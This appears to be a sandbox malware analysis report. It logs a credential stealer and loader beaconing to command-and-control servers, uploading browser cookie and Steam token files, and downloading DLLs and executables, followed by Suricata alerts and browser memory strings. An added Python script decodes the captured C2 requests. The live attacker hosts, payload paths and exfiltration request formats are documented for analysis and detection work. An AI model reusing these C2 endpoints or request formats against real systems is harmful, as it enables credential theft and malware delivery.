Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 36 36 34 45 38 38 38 32 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 2d 2d 0d 0a Data Ascii: ------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="hwid"B3664E8882872556134559------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="build"stok------EHCGIJDHDGDBGDGCGCFH--
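Two C2 request formats appear in the captures above: the multipart/form-data uploads to /c4becf79229cb002.php on 185.215.113.206 (hwid/build check-in, then token plus a message or a base64 file_name/file pair) and the x-www-form-urlencoded beacons to /Zu7JuNko/index.php on 185.215.113.43 (st=s, r=<hex>, d1=<id>&unit=<id>). The following is an added example, not code from the Joe Sandbox report, that parses both and base64-decodes the upload fields. The two sample requests are reconstructed from the report's "Data Ascii" dumps; the CRLF separators follow the 0d 0a bytes visible in the "Data Raw" hex, and headers that play no part in decoding are left out.

```python
# Added example (not part of the Joe Sandbox report): decode the two C2
# request formats captured above. Sample requests are reconstructed from
# the report's "Data Ascii" dumps; CRLF separators follow the 0d 0a bytes
# visible in the "Data Raw" hex.
import base64
import re
from urllib.parse import parse_qs


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: raw bytes} for a multipart/form-data body."""
    match = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not match:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + match.group(2).encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):
            break  # closing delimiter: "--boundary--"
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name is None:
            continue
        if part_body.endswith(b"\r\n"):
            part_body = part_body[:-2]  # the CRLF that precedes the next delimiter
        fields[name.group(1).decode("ascii")] = part_body
    return fields


def decode_stealer_fields(fields: dict) -> dict:
    """The /c4becf79229cb002.php uploads carry base64 in file_name and file; the rest is plain."""
    decoded = {name: value.decode("latin-1") for name, value in fields.items()}
    for name in ("file_name", "file"):
        if fields.get(name):
            decoded[name] = base64.b64decode(fields[name], validate=True).decode("utf-8", "replace")
    return decoded


def decode_loader_fields(body: bytes) -> dict:
    """The /Zu7JuNko/index.php beacons are plain key=value pairs (st, r, d1, unit)."""
    return {name: values[0] for name, values in parse_qs(body.decode("latin-1")).items()}


def decode_capture(raw: bytes) -> dict:
    """Dispatch on Content-Type and return the decoded request fields."""
    method, path, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    if ctype.startswith("multipart/form-data"):
        fields = decode_stealer_fields(parse_multipart(body, ctype))
    elif ctype.startswith("application/x-www-form-urlencoded"):
        fields = decode_loader_fields(body)
    else:
        fields = {}
    return {"method": method, "path": path, "host": headers.get("host"), "fields": fields}


# Constructed from the report's captures of the 185.215.113.206 cookie upload
# and one 185.215.113.43 task report; headers not needed for decoding are omitted.
STEALER_UPLOAD = (
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJ\r\n"
    b"Host: 185.215.113.206\r\n"
    b"\r\n"
    b"------IDAAFBGDBKJJJKFIIIJJ\r\n"
    b'Content-Disposition: form-data; name="token"\r\n'
    b"\r\n"
    b"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d\r\n"
    b"------IDAAFBGDBKJJJKFIIIJJ\r\n"
    b'Content-Disposition: form-data; name="file_name"\r\n'
    b"\r\n"
    b"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=\r\n"
    b"------IDAAFBGDBKJJJKFIIIJJ\r\n"
    b'Content-Disposition: form-data; name="file"\r\n'
    b"\r\n"
    b"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=\r\n"
    b"------IDAAFBGDBKJJJKFIIIJJ--\r\n"
)
LOADER_TASK_REPORT = (
    b"POST /Zu7JuNko/index.php HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: 185.215.113.43\r\n"
    b"\r\n"
    b"d1=1013581001&unit=246122658369"
)

if __name__ == "__main__":
    for capture in (STEALER_UPLOAD, LOADER_TASK_REPORT):
        print(decode_capture(capture))
```

Decoding the upload shows what the raw hex hides: file_name is "cookies\Google Chrome_.txt" and file is {"id":1,"result":{"cookies":[]}}, a JSON-RPC style reply carrying a cookies array, which is the shape a Chromium remote-debugging session returns when asked to dump cookies; the array is empty in this run. The other uploads follow the same scheme (smjllmymlbzq.pwd and steam_tokens.txt with empty bodies), and the "message" values browsers, plugins, fplugins, wallets and files are plain-text stage markers that need no decoding.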
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 80.82.65.70 80.82.65.70
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49763 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49798 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49859 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49881 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49898 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49900 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49905 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49923 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49924 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49930 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49938 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49946 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49945 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49951 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49953 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49968 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49979 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49992 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49987 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50001 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50016 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50029 -> 104.21.16.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0051E0C0 recv,recv,recv,recv, 14_2_0051E0C0
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=en-US&feed_variant=default_spocs_off equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=en-US&feed_variant=default_spocs_off equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://pubads.g.doubleclick.net/gampad/*ad*--panel-banner-item-update-supported-bgcoloraddons-search-detection@mozilla.comresource://builtin-addons/search-detection/resource://search-extensions/google/*://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etpresource://search-extensions/amazondotcom/amazondotcom%40search.mozilla.org:1.6resource://search-extensions/wikipedia/blocklisted:FEATURE_FAILURE_PARSE_DRIVER equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3279683763.00000132BB544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3276641087.00000132BB450000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB4D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
